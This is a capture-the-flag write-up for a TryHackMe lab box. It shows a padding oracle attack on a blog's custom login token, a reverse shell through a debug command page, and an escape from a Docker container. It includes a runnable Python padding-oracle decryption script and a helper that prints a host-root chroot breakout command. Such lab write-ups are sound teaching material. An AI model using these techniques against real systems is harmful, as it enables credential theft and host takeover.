TryHackMe — New York Flankees — Write-Up
Can you, the rogue adventurer, break through Stefan’s defences to take control of his blog!
Task 1 Padding For The New York Flankees
New York Flankees was an interesting box. I got stuck on the initial foothold itself, which took a lot of time. Eventually I remembered that when nothing is working, the best move is to go back and do more recon.
Key Takeaways:
- The Nmap scan showed an HTTP service running on port 8080.
- Exploit the padding oracle vulnerability in Stefan's custom authentication.
- Get a reverse shell through the debug page.
- Break out of the Docker container.
Recon:
Nmap:
Nmap scan
Started off with Nmap and spotted an HTTP service running on port 8080. Time to dig deeper!
Home Page
While navigating, I noticed something interesting on the Stefan Test page: a JavaScript snippet that seemed out of place. Curiosity piqued, I took a closer look.
Stefan’s Test page (inspect)
JS part of Stefan’s Test page
Let’s try appending the URL path from the snippet to our machine’s IP.
Result after appending urlpath
Here we got a custom authentication success message; if we recall, this was the first task on Stefan’s to-do list.
Result after changing one character of the string
If I changed any character of the string, I received a decryption error. So the endpoint tells us whether a tampered ciphertext still decrypts cleanly, which is exactly the side channel a padding oracle attack needs.
I attempted to crack the value with Hashcat, but that turned out to be a bad move: it is ciphertext, not a hash, and the detour cost me another hour.
After reading the to-do notes, I did a Google search and found a helpful HackTricks page where I learned about Padding Oracle:
Search Results
Padding Oracle
When an application decrypts CBC-encrypted data, it first runs the block cipher decryption and then checks and strips the padding. If invalid padding makes the application behave observably differently (an error message, an empty response, a different status code, or a slower reply), this is called a padding oracle vulnerability.
If you can observe this behaviour, you can recover the plaintext of any ciphertext byte by byte, and even forge new valid ciphertexts, without ever learning the key.
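The attack end to end, as an added example that is not the blog's code or padre's. The real box used an unknown server-side cipher; here a toy SHA-256 Feistel block cipher (an assumption, and not secure) stands in for it so the example runs offline with the standard library. The attack only ever calls the oracle, which returns one bit: clean decryption or "decryption error". The sample credentials in `demo()` are constructed.

```python
import hashlib
import secrets

BLOCK = 16

# Toy CBC back end standing in for the blog's real encryption. A 4-round SHA-256
# Feistel network is NOT secure; it exists only so the example runs offline.
def _xor(a: bytes, b: bytes) -> bytes: return bytes(x ^ y for x, y in zip(a, b))
def _f(key: bytes, rnd: int, half: bytes) -> bytes: return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def _block_encrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, rnd, r))
    return l + r

def _block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, rnd, l)), l
    return l + r

def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if len(data) % BLOCK or not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("decryption error")      # what the Stefan Test page returns
    return data[:-n]

def cbc_encrypt(key: bytes, iv: bytes, padded: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = _block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(_block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

def make_oracle(key: bytes):
    # The server-side check: True on clean decryption, False on "decryption error".
    def oracle(token: bytes) -> bool:            # token = IV || ciphertext
        try:
            pkcs7_unpad(cbc_decrypt(key, token[:BLOCK], token[BLOCK:]))
            return True
        except ValueError:
            return False
    return oracle

# The attack: recover one block by feeding the oracle a forged preceding block.
def attack_block(oracle, prev: bytes, target: bytes) -> bytes:
    inter = bytearray(BLOCK)   # D_K(target), filled in from the last byte backwards
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos
        forged = bytearray(BLOCK)
        for k in range(pos + 1, BLOCK):
            forged[k] = inter[k] ^ pad           # known bytes are made to decrypt to `pad`
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + target):
                continue
            if pos == BLOCK - 1:
                # Edge case: the last byte can also pass because the tail happens to
                # decrypt to 0x02 0x02 etc. Disturb the byte before it; a true 0x01 survives.
                forged[pos - 1] ^= 0xFF
                still_ok = oracle(bytes(forged) + target)
                forged[pos - 1] ^= 0xFF
                if not still_ok:
                    continue
            inter[pos] = guess ^ pad
            break
        else:
            raise RuntimeError(f"oracle never accepted byte {pos}")
    return _xor(inter, prev)                     # P_i = D_K(C_i) XOR C_(i-1)

def padding_oracle_decrypt(oracle, token: bytes) -> bytes:
    blocks = [token[i:i + BLOCK] for i in range(0, len(token), BLOCK)]
    plain = b"".join(attack_block(oracle, blocks[i - 1], blocks[i])
                     for i in range(1, len(blocks)))
    return pkcs7_unpad(plain)

def demo() -> bytes:
    key, iv = secrets.token_bytes(16), secrets.token_bytes(16)
    secret = b"admin:correct-horse-battery"     # constructed sample credentials
    token = iv + cbc_encrypt(key, iv, pkcs7_pad(secret))
    return padding_oracle_decrypt(make_oracle(key), token)
```

Each plaintext byte costs at most 256 oracle calls (plus one confirmation for the last byte of every block), which is why a tool like padre parallelises the HTTP requests. Against the box, `oracle` is replaced by an HTTP request to the Stefan Test endpoint that returns False whenever the response contains the decryption error.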
After learning more about the vulnerability, I found a tool that was much faster than the script shown in HackTricks: padre.
Parameters:
- -u : the target URL (the position of the ciphertext is marked with a $ placeholder)
- -err : the error code or error string the server returns for bad padding
- -p : number of parallel HTTP connections
- -e : encoding to apply to the binary data (in our case lhex, lowercase hex)
I initially forgot to specify the encoding, which is why it didn’t work the first time. After adding -e lhex, padre recovered the admin username and password, and with them the answer to the first question.
When we logged in, a button labelled “Debug” appeared in the right corner.
On the debug page we found our first flag.
This page allowed us to execute commands on the machine.
Upon entering a valid command we received a 200 OK response; any random input resulted in a 500 Internal Server Error.
It’s time to exploit it.
First, we need to prepare our payload and start a Netcat listener and an HTTP server.
The next step is to write our shell to the server.
Tip: write or upload the shell into the /tmp/ directory, because everyone has permission to write there. One caveat: /tmp is sometimes mounted noexec, in which case run the script through its interpreter (for example bash /tmp/script.sh) instead of executing it directly.
And there we go: we got the request on our HTTP server, which means the shell was successfully fetched onto the target.
Next, we have to give our shell executable permissions and run it.
We’ve got our shell.
The first thing we do after getting a shell is spawn a TTY. We got the shell directly as root, which is suspicious.
As we explore, I discover that we are inside a Docker container.
Moving into the app directory of the container, the docker-compose.yml file gave us the answer to the third question and our second flag.
Now it’s time to break out of the Docker environment.
We’ll use the following command to break out of the container.
We can leverage any of the listed images.
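Added example, not the blog's commands: a small helper that confirms you are inside a container and builds the escape. It assumes the Docker socket (or another Docker API endpoint) is reachable from inside the container, which is what lets `docker images` list the host's images in the first place; the bind-mount and chroot path is the generic breakout for that situation, and the cgroup text passed to `container_indicators` in tests is constructed.

```python
import os

def container_indicators(dockerenv: bool, cgroup_text: str, docker_sock: bool) -> list:
    # Pure decision logic over three observations so it can be tested with
    # constructed input; gather() collects the real ones from the file system.
    hits = []
    if dockerenv:
        hits.append("/.dockerenv exists")
    if any(tag in cgroup_text for tag in ("docker", "containerd", "kubepods")):
        hits.append("PID 1 runs in a container cgroup")
    if docker_sock:
        hits.append("/var/run/docker.sock is mounted: host Docker daemon reachable")
    return hits

def gather() -> list:
    try:
        with open("/proc/1/cgroup") as fh:
            cgroup = fh.read()
    except OSError:
        cgroup = ""
    return container_indicators(os.path.exists("/.dockerenv"), cgroup,
                                os.path.exists("/var/run/docker.sock"))

def breakout_commands(image: str) -> list:
    # Assumes the Docker socket is reachable. Start a fresh container from any
    # listed image with the host's root filesystem bind-mounted, then chroot into
    # it: the resulting shell is root on the host, not in the container.
    return [
        "docker images",
        f"docker run --rm -it -v /:/host {image} chroot /host /bin/sh",
    ]

if __name__ == "__main__":
    for hit in gather():
        print("[+]", hit)
    print("\n".join(breakout_commands("<any image from docker images>")))
```

If `docker images` works but the socket is not mounted, check `DOCKER_HOST` in the environment; the breakout command is the same either way.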